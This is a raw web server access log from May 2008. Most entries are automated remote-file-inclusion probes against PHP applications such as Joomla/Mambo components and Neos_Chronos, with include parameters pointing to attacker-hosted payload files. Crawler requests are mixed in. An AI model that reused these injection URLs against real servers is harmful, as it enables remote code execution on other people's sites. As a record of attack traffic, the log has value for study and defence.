69.9.36.146 - - [28/May/2008:06:51:06 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
69.9.36.146 - - [28/May/2008:06:51:06 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
65.55.208.134 - - [28/May/2008:06:52:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [28/May/2008:06:52:15 -0500] "GET /logs/access_log.1201305600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.17.111.38 - - [28/May/2008:06:52:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
85.17.111.38 - - [28/May/2008:06:52:48 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
69.9.36.146 - - [28/May/2008:06:53:26 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.9.36.146 - - [28/May/2008:06:53:26 -0500] "GET //Neos_Chronos/header.php?base_folder=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
151.11.24.250 - - [28/May/2008:06:53:48 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 313 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
151.11.24.250 - - [28/May/2008:06:53:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 308 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
62.112.193.46 - - [28/May/2008:06:55:08 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.112.193.46 - - [28/May/2008:06:55:08 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.112.193.46 - - [28/May/2008:06:55:08 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.112.193.46 - - [28/May/2008:06:55:09 -0500] "GET //config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
62.112.193.46 - - [28/May/2008:06:55:09 -0500] "GET //config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
62.112.193.46 - - [28/May/2008:06:55:09 -0500] "GET //config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
151.11.24.250 - - [28/May/2008:06:55:15 -0500] "GET /%1Fvulnhttp://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 338 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
151.11.24.250 - - [28/May/2008:06:55:16 -0500] "GET /logs/%1Fvulnhttp://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 343 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
74.6.17.187 - - [28/May/2008:07:00:00 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2214 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
75.125.252.82 - - [28/May/2008:07:00:47 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
75.125.252.82 - - [28/May/2008:07:00:47 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
62.148.169.202 - - [28/May/2008:07:05:22 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.discoveryindonesia.com/portal//administrator/components/com_joomla-visites/core/include/modul/idd.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
62.148.169.202 - - [28/May/2008:07:05:23 -0500] "GET //config/dbutil.bck.php?confdir=http://www.discoveryindonesia.com/portal//administrator/components/com_joomla-visites/core/include/modul/idd.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
141.53.8.217 - - [28/May/2008:07:08:00 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
141.53.8.217 - - [28/May/2008:07:08:00 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
80.237.209.104 - - [28/May/2008:07:10:02 -0500] "GET /logs/errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
80.237.209.104 - - [28/May/2008:07:10:03 -0500] "GET /errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
72.9.228.149 - - [28/May/2008:07:13:09 -0500] "GET /logs//include/logout.php?PSA_PATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
72.9.228.149 - - [28/May/2008:07:13:09 -0500] "GET //include/logout.php?PSA_PATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.812"
69.9.36.146 - - [28/May/2008:07:14:00 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.9.36.146 - - [28/May/2008:07:14:00 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
75.125.252.82 - - [28/May/2008:07:14:18 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
75.125.252.82 - - [28/May/2008:07:14:19 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
24.148.29.218 - - [28/May/2008:07:18:37 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
59.126.46.141 - - [28/May/2008:07:21:39 -0500] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 308 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
59.126.46.141 - - [28/May/2008:07:21:42 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 313 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
200.62.55.102 - - [28/May/2008:07:22:50 -0500] "GET /logs//include/logout.php?PSA_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.62.55.102 - - [28/May/2008:07:22:50 -0500] "GET //include/logout.php?PSA_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
74.6.18.217 - - [28/May/2008:07:24:18 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.16.216 - - [28/May/2008:07:24:18 -0500] "GET /logs/access_log.1167782400 HTTP/1.0" 200 252923 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
61.63.40.205 - - [28/May/2008:07:27:23 -0500] "GET /logs//include/logout.php?PSA_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
61.63.40.205 - - [28/May/2008:07:27:23 -0500] "GET //include/logout.php?PSA_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
61.63.9.163 - - [28/May/2008:07:32:15 -0500] "GET /logs/errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.63"
61.63.9.163 - - [28/May/2008:07:32:16 -0500] "GET /errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.63"
212.145.146.10 - - [28/May/2008:07:34:06 -0500] "GET /logs/access_log.1207180800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
212.145.146.10 - - [28/May/2008:07:34:07 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
212.145.146.10 - - [28/May/2008:07:34:07 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
65.55.208.130 - - [28/May/2008:07:34:10 -0500] "GET /logs/access_log.1163980800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
91.121.106.117 - - [28/May/2008:07:38:51 -0500] "GET /logs//include/logout.php?PSA_PATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
91.121.106.117 - - [28/May/2008:07:38:51 -0500] "GET //include/logout.php?PSA_PATH=http://trinidadandtobagonews.com/blog/id.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
72.9.228.149 - - [28/May/2008:07:39:48 -0500] "GET /logs//include/logout.php?PSA_PATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
72.9.228.149 - - [28/May/2008:07:39:48 -0500] "GET //include/logout.php?PSA_PATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.812"
203.22.204.188 - - [28/May/2008:07:40:16 -0500] "GET /logs//include/logout.php?PSA_PATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
203.22.204.188 - - [28/May/2008:07:40:16 -0500] "GET //include/logout.php?PSA_PATH=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
213.148.252.24 - - [28/May/2008:07:43:07 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:07:43:08 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
195.74.37.170 - - [28/May/2008:07:44:28 -0500] "GET /logs/access_log.1207180800/tools/error/error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
195.74.37.170 - - [28/May/2008:07:44:28 -0500] "GET /tools/error/error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.808"
195.74.37.170 - - [28/May/2008:07:44:28 -0500] "GET /logs/tools/error/error.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
222.122.13.106 - - [28/May/2008:07:47:42 -0500] "GET /logs/access_log.1207180800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:07:47:42 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:07:47:42 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
80.237.209.104 - - [28/May/2008:07:47:56 -0500] "GET /logs/errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
80.237.209.104 - - [28/May/2008:07:47:56 -0500] "GET /errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:07:48:20 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:07:48:21 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
74.6.76.45 - - [28/May/2008:07:51:24 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.74.37.170 - - [28/May/2008:07:55:01 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
195.74.37.170 - - [28/May/2008:07:55:02 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
72.52.212.40 - - [28/May/2008:08:00:38 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
72.52.212.40 - - [28/May/2008:08:00:38 -0500] "GET //skin/zero_vote/error.php?dir=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
202.60.74.190 - - [28/May/2008:08:01:58 -0500] "GET /logs/access_log.1207180800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
202.60.74.190 - - [28/May/2008:08:01:59 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
202.60.74.190 - - [28/May/2008:08:01:59 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
67.15.205.17 - - [28/May/2008:08:02:14 -0500] "GET /logs//index.php?basepath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.15.205.17 - - [28/May/2008:08:02:14 -0500] "GET //index.php?basepath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
141.53.8.217 - - [28/May/2008:08:09:45 -0500] "GET /logs/access_log.1207008000//Neos_Chronos/header.php?base_folder=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
141.53.8.217 - - [28/May/2008:08:11:55 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
67.195.98.220 - - [28/May/2008:08:21:46 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
61.63.9.163 - - [28/May/2008:08:27:21 -0500] "GET /logs/errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.63"
61.63.9.163 - - [28/May/2008:08:27:22 -0500] "GET /errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.63"
213.148.252.24 - - [28/May/2008:08:27:55 -0500] "GET /logs/access_log.1207180800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:27:56 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:27:56 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:28:58 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:29:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:29:03 -0500] "GET //skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:29:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:29:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:29:03 -0500] "GET //skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:29:03 -0500] "GET //skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
222.255.9.248 - - [28/May/2008:08:29:08 -0500] "GET //skin/zero_vote/error.php?dir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:29:59 -0500] "GET /logs/access_log.1207008000/////////////?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:29:59 -0500] "GET /////////////?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 200 1254 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:30:04 -0500] "GET /logs/////////////?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 200 85289 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:30:58 -0500] "GET /logs/access_log.1207785600/////////////?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
64.38.8.186 - - [28/May/2008:08:36:51 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:08:36:51 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
67.15.205.17 - - [28/May/2008:08:42:03 -0500] "GET /logs/access_log.1207785600//index.php?basepath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
67.15.205.17 - - [28/May/2008:08:42:03 -0500] "GET //index.php?basepath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
67.15.205.17 - - [28/May/2008:08:42:03 -0500] "GET /logs//index.php?basepath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
84.21.71.133 - - [28/May/2008:08:46:18 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
84.21.71.133 - - [28/May/2008:08:46:19 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
64.136.58.116 - - [28/May/2008:08:50:46 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
64.136.58.116 - - [28/May/2008:08:50:46 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
211.20.85.150 - - [28/May/2008:08:50:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
65.55.208.132 - - [28/May/2008:08:51:14 -0500] "GET /logs/access_log.1163289600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.35.33.82 - - [28/May/2008:08:51:20 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
200.35.33.82 - - [28/May/2008:08:51:22 -0500] "GET //config/dbutil.bck.php?confdir=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
62.2.100.138 - - [28/May/2008:08:52:26 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:08:52:27 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
64.180.134.223 - - [28/May/2008:08:53:30 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
64.180.134.223 - - [28/May/2008:08:53:30 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
74.208.69.184 - - [28/May/2008:08:53:50 -0500] "GET /logs//lazarusgb/admin.php?include_path=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.208.69.184 - - [28/May/2008:08:53:50 -0500] "GET //lazarusgb/admin.php?include_path=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.148.252.24 - - [28/May/2008:08:55:24 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:55:24 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:56:24 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:08:56:24 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
216.167.156.20 - - [28/May/2008:08:56:57 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:08:56:57 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
24.148.29.218 - - [28/May/2008:08:58:07 -0500] "GET /logs/access_log.1207180800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
24.148.29.218 - - [28/May/2008:08:58:11 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
24.148.29.218 - - [28/May/2008:08:58:15 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
67.15.205.17 - - [28/May/2008:08:58:17 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
67.15.205.17 - - [28/May/2008:08:58:18 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
195.12.53.176 - - [28/May/2008:08:58:42 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 333 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
62.2.100.138 - - [28/May/2008:09:01:38 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:09:01:39 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
212.69.44.107 - - [28/May/2008:09:08:26 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
218.234.21.89 - - [28/May/2008:09:08:29 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
218.234.21.89 - - [28/May/2008:09:08:29 -0500] "GET //Neos_Chronos/header.php?base_folder=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
89.149.226.176 - - [28/May/2008:09:12:18 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
89.149.226.176 - - [28/May/2008:09:12:21 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
65.55.208.135 - - [28/May/2008:09:22:03 -0500] "GET /logs/access_log.1195257600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [28/May/2008:09:36:14 -0500] "GET /logs/access_log.1188604800 HTTP/1.1" 200 177628 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
